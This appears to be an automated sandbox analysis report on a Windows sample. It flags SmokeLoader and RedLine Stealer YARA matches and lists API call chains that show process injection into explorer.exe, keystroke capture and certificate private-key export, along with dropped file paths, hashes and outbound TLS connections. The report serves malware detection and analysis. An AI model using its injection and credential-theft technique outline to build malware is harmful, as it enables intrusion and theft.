Source: unknown	HTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.4:49774 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.4:49775 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.4:49776 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.4:49777 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.4:49778 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.4:49779 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.4:49780 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.4:49781 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.4:49782 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.4:49783 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.4:49789 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.4:49791 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.4:49793 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.4:49795 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Yara detected SmokeLoader

Source: Yara match	File source: 00000010.00000002.4137644244.0000000000111000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.4138340959.0000000000B41000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: explorer.exe PID: 6112, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: explorer.exe PID: 412, type: MEMORYSTR
Source: Yara match	File source: 9.3.uievsid.630000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.38E5.exe.610e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 33.3.uievsid.630000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.38E5.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 33.2.uievsid.5d0e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.uievsid.5d0e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 33.2.uievsid.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.3.38E5.exe.730000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.uievsid.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000007.00000002.2487345753.0000000000761000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1737221336.0000000002731000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000002.3707478995.0000000002731000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.2436031389.0000000000730000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2753825516.0000000000630000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1737075127.00000000025C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.1970636946.0000000002710000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000003.2699654261.0000000000630000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2487198589.0000000000730000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.1970849868.00000000040E1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2754187003.0000000000651000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000002.3707296343.0000000002710000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000021.00000003.3713654761.0000000000630000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

Source: C:\Windows\SysWOW64\explorer.exe

Code function: 17_2_00A3162B GetKeyboardState,ToUnicode,

17_2_00A3162B

Source: C:\Users\user\AppData\Local\Temp\BC8F.exe

Code function: 10_2_00007FF6AAB43220 CertGetCertificateContextProperty,CryptAcquireCertificatePrivateKey,CryptGetUserKey,LoadLibraryA,GetProcAddress,VirtualProtect,VirtualProtect,CryptExportKey,VirtualProtect,VirtualProtect,CryptAcquireContextA,CryptImportKey,OpenSCManagerA,OpenServiceA,QueryServiceStatusEx,OpenProcess,ReadProcessMemory,ReadProcessMemory,WriteProcessMemory,NCryptExportKey,CertOpenStore,CertAddCertificateLinkToStore,CertSetCertificateContextProperty,PFXExportCertStoreEx,PFXExportCertStoreEx,

10_2_00007FF6AAB43220

System Summary

Malicious sample detected (through community Yara rule)

Source: 00000007.00000002.2487345753.0000000000761000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000000.00000002.1737221336.0000000002731000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000021.00000002.4141842433.00000000005D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000022.00000002.3707478995.0000000002731000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000009.00000002.2753538015.00000000005D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000009.00000002.2753825516.0000000000630000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000005.00000002.1970758383.000000000273D000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000000.00000002.1737075127.00000000025C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000007.00000002.2487596772.000000000083E000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000005.00000002.1970636946.0000000002710000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000000.00000002.1737041120.00000000025B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000000.00000002.1737299923.000000000276D000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000009.00000002.2754697355.00000000006AE000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000022.00000002.3707763574.00000000027CF000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000007.00000002.2487198589.0000000000730000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000022.00000002.3707006171.00000000025F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000005.00000002.1970451441.00000000025B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000007.00000002.2487104825.0000000000610000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000005.00000002.1970849868.00000000040E1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000009.00000002.2754187003.0000000000651000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000022.00000002.3707296343.0000000002710000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000021.00000002.4143586325.00000000006B2000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown

Source: C:\Windows\explorer.exe

Process Stats: CPU usage > 49%

Source: C:\Users\user\Desktop\veEGy9FijY.exe	Code function: 0_2_00401514 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,VirtualProtect,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	0_2_00401514
Source: C:\Users\user\Desktop\veEGy9FijY.exe	Code function: 0_2_00402F97 RtlCreateUserThread,NtTerminateProcess,	0_2_00402F97
Source: C:\Users\user\Desktop\veEGy9FijY.exe	Code function: 0_2_00401542 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,VirtualProtect,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	0_2_00401542
Source: C:\Users\user\Desktop\veEGy9FijY.exe	Code function: 0_2_00403247 NtTerminateProcess,GetModuleHandleA,	0_2_00403247
Source: C:\Users\user\Desktop\veEGy9FijY.exe	Code function: 0_2_00401549 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,VirtualProtect,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	0_2_00401549
Source: C:\Users\user\Desktop\veEGy9FijY.exe	Code function: 0_2_0040324F NtTerminateProcess,GetModuleHandleA,	0_2_0040324F
Source: C:\Users\user\Desktop\veEGy9FijY.exe	Code function: 0_2_00403256 NtTerminateProcess,GetModuleHandleA,	0_2_00403256
Source: C:\Users\user\Desktop\veEGy9FijY.exe	Code function: 0_2_00401557 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,VirtualProtect,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	0_2_00401557
Source: C:\Users\user\Desktop\veEGy9FijY.exe	Code function: 0_2_0040326C NtTerminateProcess,GetModuleHandleA,	0_2_0040326C
Source: C:\Users\user\Desktop\veEGy9FijY.exe	Code function: 0_2_00403277 NtTerminateProcess,GetModuleHandleA,	0_2_00403277
Source: C:\Users\user\Desktop\veEGy9FijY.exe	Code function: 0_2_004014FE NtDuplicateObject,NtCreateSection,NtMapViewOfSection,VirtualProtect,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	0_2_004014FE
Source: C:\Users\user\Desktop\veEGy9FijY.exe	Code function: 0_2_00403290 NtTerminateProcess,GetModuleHandleA,	0_2_00403290
Source: C:\Users\user\AppData\Roaming\haevsid	Code function: 5_2_00401514 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,VirtualProtect,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	5_2_00401514
Source: C:\Users\user\AppData\Roaming\haevsid	Code function: 5_2_00402F97 RtlCreateUserThread,NtTerminateProcess,	5_2_00402F97
Source: C:\Users\user\AppData\Roaming\haevsid	Code function: 5_2_00401542 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,VirtualProtect,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	5_2_00401542
Source: C:\Users\user\AppData\Roaming\haevsid	Code function: 5_2_00403247 NtTerminateProcess,GetModuleHandleA,	5_2_00403247
Source: C:\Users\user\AppData\Roaming\haevsid	Code function: 5_2_00401549 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,VirtualProtect,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	5_2_00401549
Source: C:\Users\user\AppData\Roaming\haevsid	Code function: 5_2_0040324F NtTerminateProcess,GetModuleHandleA,	5_2_0040324F
Source: C:\Users\user\AppData\Roaming\haevsid	Code function: 5_2_00403256 NtTerminateProcess,GetModuleHandleA,	5_2_00403256
Source: C:\Users\user\AppData\Roaming\haevsid	Code function: 5_2_00401557 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,VirtualProtect,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	5_2_00401557
Source: C:\Users\user\AppData\Roaming\haevsid	Code function: 5_2_0040326C NtTerminateProcess,GetModuleHandleA,	5_2_0040326C
Source: C:\Users\user\AppData\Roaming\haevsid	Code function: 5_2_00403277 NtTerminateProcess,GetModuleHandleA,	5_2_00403277
Source: C:\Users\user\AppData\Roaming\haevsid	Code function: 5_2_004032C7 CreateFileW,GetForegroundWindow,NtMapViewOfSection,NtDuplicateObject,NtQuerySystemInformation,NtOpenKey,NtQueryKey,NtEnumerateKey,RtlCreateUserThread,strstr,wcsstr,tolower,towlower,	5_2_004032C7
Source: C:\Users\user\AppData\Roaming\haevsid	Code function: 5_2_004014FE NtDuplicateObject,NtCreateSection,NtMapViewOfSection,VirtualProtect,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	5_2_004014FE
Source: C:\Users\user\AppData\Roaming\haevsid	Code function: 5_2_00403290 NtTerminateProcess,GetModuleHandleA,	5_2_00403290
Source: C:\Users\user\AppData\Local\Temp\38E5.exe	Code function: 7_2_00403043 RtlCreateUserThread,NtTerminateProcess,	7_2_00403043
Source: C:\Users\user\AppData\Local\Temp\38E5.exe	Code function: 7_2_004014C4 NtAllocateVirtualMemory,NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	7_2_004014C4
Source: C:\Users\user\AppData\Local\Temp\38E5.exe	Code function: 7_2_00401508 NtAllocateVirtualMemory,	7_2_00401508
Source: C:\Users\user\AppData\Local\Temp\38E5.exe	Code function: 7_2_004014CF NtAllocateVirtualMemory,	7_2_004014CF
Source: C:\Users\user\AppData\Local\Temp\38E5.exe	Code function: 7_2_004015D5 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	7_2_004015D5
Source: C:\Users\user\AppData\Local\Temp\38E5.exe	Code function: 7_2_004014DE NtAllocateVirtualMemory,	7_2_004014DE
Source: C:\Users\user\AppData\Local\Temp\38E5.exe	Code function: 7_2_004015DF NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	7_2_004015DF
Source: C:\Users\user\AppData\Local\Temp\38E5.exe	Code function: 7_2_004015E6 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	7_2_004015E6
Source: C:\Users\user\AppData\Local\Temp\38E5.exe	Code function: 7_2_004015F2 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	7_2_004015F2
Source: C:\Users\user\AppData\Local\Temp\38E5.exe	Code function: 7_2_004014F5 NtAllocateVirtualMemory,	7_2_004014F5
Source: C:\Users\user\AppData\Local\Temp\38E5.exe	Code function: 7_2_004014F8 NtAllocateVirtualMemory,	7_2_004014F8
Source: C:\Users\user\AppData\Local\Temp\38E5.exe	Code function: 7_2_004014FB NtAllocateVirtualMemory,	7_2_004014FB
Source: C:\Users\user\AppData\Roaming\uievsid	Code function: 9_2_00403043 RtlCreateUserThread,NtTerminateProcess,	9_2_00403043
Source: C:\Users\user\AppData\Roaming\uievsid	Code function: 9_2_004014C4 NtAllocateVirtualMemory,NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	9_2_004014C4
Source: C:\Users\user\AppData\Roaming\uievsid	Code function: 9_2_00401508 NtAllocateVirtualMemory,	9_2_00401508
Source: C:\Users\user\AppData\Roaming\uievsid	Code function: 9_2_004014CF NtAllocateVirtualMemory,	9_2_004014CF
Source: C:\Users\user\AppData\Roaming\uievsid	Code function: 9_2_004015D5 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	9_2_004015D5
Source: C:\Users\user\AppData\Roaming\uievsid	Code function: 9_2_004014DE NtAllocateVirtualMemory,	9_2_004014DE
Source: C:\Users\user\AppData\Roaming\uievsid	Code function: 9_2_004015DF NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	9_2_004015DF
Source: C:\Users\user\AppData\Roaming\uievsid	Code function: 9_2_004015E6 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	9_2_004015E6
Source: C:\Users\user\AppData\Roaming\uievsid	Code function: 9_2_004015F2 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	9_2_004015F2
Source: C:\Users\user\AppData\Roaming\uievsid	Code function: 9_2_004014F5 NtAllocateVirtualMemory,	9_2_004014F5
Source: C:\Users\user\AppData\Roaming\uievsid	Code function: 9_2_004014F8 NtAllocateVirtualMemory,	9_2_004014F8
Source: C:\Users\user\AppData\Roaming\uievsid	Code function: 9_2_004014FB NtAllocateVirtualMemory,	9_2_004014FB
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 13_2_00E04B92 RtlMoveMemory,NtUnmapViewOfSection,	13_2_00E04B92
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 13_2_00E033C3 NtQueryInformationFile,	13_2_00E033C3
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 13_2_00E0349B CreateFileW,OpenProcess,NtQueryInformationProcess,NtQueryInformationProcess,NtQueryInformationProcess,GetCurrentProcess,DuplicateHandle,lstrcmpiW,NtQueryObject,StrRChrW,StrRChrW,lstrcmpiW,GetFileSize,SetFilePointer,SetFilePointer,ReadFile,SetFilePointer,CloseHandle,CloseHandle,CloseHandle,	13_2_00E0349B
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 13_2_00E0342B NtQueryObject,NtQueryObject,RtlMoveMemory,	13_2_00E0342B
Source: C:\Windows\explorer.exe	Code function: 14_2_001D38B0 NtUnmapViewOfSection,	14_2_001D38B0
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 15_2_00B41016 RtlMoveMemory,RtlMoveMemory,NtUnmapViewOfSection,GetCurrentProcessId,lstrcmpiA,CreateToolhelp32Snapshot,Process32First,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,Process32Next,CloseHandle,Sleep,	15_2_00B41016
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 15_2_00B41819 lstrcmpiA,OpenProcess,NtSetInformationProcess,CloseHandle,NtUnmapViewOfSection,NtUnmapViewOfSection,RtlMoveMemory,RtlMoveMemory,RtlMoveMemory,NtUnmapViewOfSection,CloseHandle,CreateMutexA,GetLastError,CloseHandle,Sleep,GetModuleHandleA,GetProcAddress,ReadProcessMemory,WriteProcessMemory,CreateRemoteThread,CloseHandle,Sleep,WriteProcessMemory,CreateRemoteThread,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,	15_2_00B41819
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 15_2_00B41A80 NtCreateSection,NtMapViewOfSection,	15_2_00B41A80
Source: C:\Windows\explorer.exe	Code function: 16_2_0011355C NtUnmapViewOfSection,	16_2_0011355C
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 17_2_00A31016 RtlMoveMemory,RtlMoveMemory,NtUnmapViewOfSection,GetCurrentProcessId,wsprintfA,RtlMoveMemory,CreateToolhelp32Snapshot,Process32First,CharLowerA,lstrcmpiA,lstrcmpiA,Process32Next,CloseHandle,Sleep,	17_2_00A31016
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 17_2_00A31B26 NtCreateSection,NtMapViewOfSection,	17_2_00A31B26
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 17_2_00A318BF OpenProcess,NtSetInformationProcess,CloseHandle,NtUnmapViewOfSection,NtUnmapViewOfSection,RtlMoveMemory,RtlMoveMemory,RtlMoveMemory,NtUnmapViewOfSection,CloseHandle,CreateMutexA,GetLastError,CloseHandle,Sleep,GetModuleHandleA,GetProcAddress,ReadProcessMemory,WriteProcessMemory,CreateRemoteThread,CloseHandle,Sleep,WriteProcessMemory,CreateRemoteThread,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,	17_2_00A318BF

Source: C:\Users\user\AppData\Local\Temp\38E5.exe	Code function: 7_2_0043EC27	7_2_0043EC27
Source: C:\Users\user\AppData\Local\Temp\38E5.exe	Code function: 7_2_00439CC0	7_2_00439CC0
Source: C:\Users\user\AppData\Local\Temp\38E5.exe	Code function: 7_2_0043F178	7_2_0043F178
Source: C:\Users\user\AppData\Local\Temp\38E5.exe	Code function: 7_2_0043F6C9	7_2_0043F6C9
Source: C:\Users\user\AppData\Local\Temp\38E5.exe	Code function: 7_2_00440B13	7_2_00440B13
Source: C:\Users\user\AppData\Roaming\uievsid	Code function: 9_2_0043EC27	9_2_0043EC27
Source: C:\Users\user\AppData\Roaming\uievsid	Code function: 9_2_00439CC0	9_2_00439CC0
Source: C:\Users\user\AppData\Roaming\uievsid	Code function: 9_2_0043F178	9_2_0043F178
Source: C:\Users\user\AppData\Roaming\uievsid	Code function: 9_2_0043F6C9	9_2_0043F6C9
Source: C:\Users\user\AppData\Roaming\uievsid	Code function: 9_2_00440B13	9_2_00440B13
Source: C:\Users\user\AppData\Roaming\uievsid	Code function: 9_2_006AE1F4	9_2_006AE1F4
Source: C:\Users\user\AppData\Local\Temp\BC8F.exe	Code function: 10_2_00007FF6AAB49AC8	10_2_00007FF6AAB49AC8
Source: C:\Users\user\AppData\Local\Temp\BC8F.exe	Code function: 10_2_00007FF6AAB43220	10_2_00007FF6AAB43220
Source: C:\Users\user\AppData\Local\Temp\BC8F.exe	Code function: 10_2_00007FF6AAB4DC20	10_2_00007FF6AAB4DC20
Source: C:\Users\user\AppData\Local\Temp\BC8F.exe	Code function: 10_2_00007FF6AAB4A78C	10_2_00007FF6AAB4A78C
Source: C:\Users\user\AppData\Local\Temp\BC8F.exe	Code function: 10_2_00007FF6AAB4213C	10_2_00007FF6AAB4213C
Source: C:\Users\user\AppData\Local\Temp\BC8F.exe	Code function: 10_2_00007FF6AAB4A534	10_2_00007FF6AAB4A534
Source: C:\Users\user\AppData\Local\Temp\BC8F.exe	Code function: 10_2_00007FF6AAB4B43C	10_2_00007FF6AAB4B43C
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 13_2_00E02198	13_2_00E02198
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 13_2_00E0C2F9	13_2_00E0C2F9
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 13_2_00E1B35C	13_2_00E1B35C
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 13_2_00E54438	13_2_00E54438
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 13_2_00E1B97E	13_2_00E1B97E
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 13_2_00E06E6A	13_2_00E06E6A
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 13_2_00E25F08	13_2_00E25F08
Source: C:\Windows\explorer.exe	Code function: 14_2_001D1E20	14_2_001D1E20
Source: C:\Windows\explorer.exe	Code function: 16_2_00112054	16_2_00112054
Source: C:\Windows\explorer.exe	Code function: 16_2_00112860	16_2_00112860

Source: Joe Sandbox View

Dropped File: C:\Users\user\AppData\Local\Temp\BC8F.exe 1B0BE4B4B45A52650502425ABBBA226CBF0CCE5959F7A178189AE9AD79AB6911

Source: C:\Windows\SysWOW64\explorer.exe

Code function: String function: 00E08801 appears 38 times

Source: veEGy9FijY.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 00000007.00000002.2487345753.0000000000761000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000000.00000002.1737221336.0000000002731000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000021.00000002.4141842433.00000000005D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000022.00000002.3707478995.0000000002731000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000009.00000002.2753538015.00000000005D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000009.00000002.2753825516.0000000000630000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000005.00000002.1970758383.000000000273D000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000000.00000002.1737075127.00000000025C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
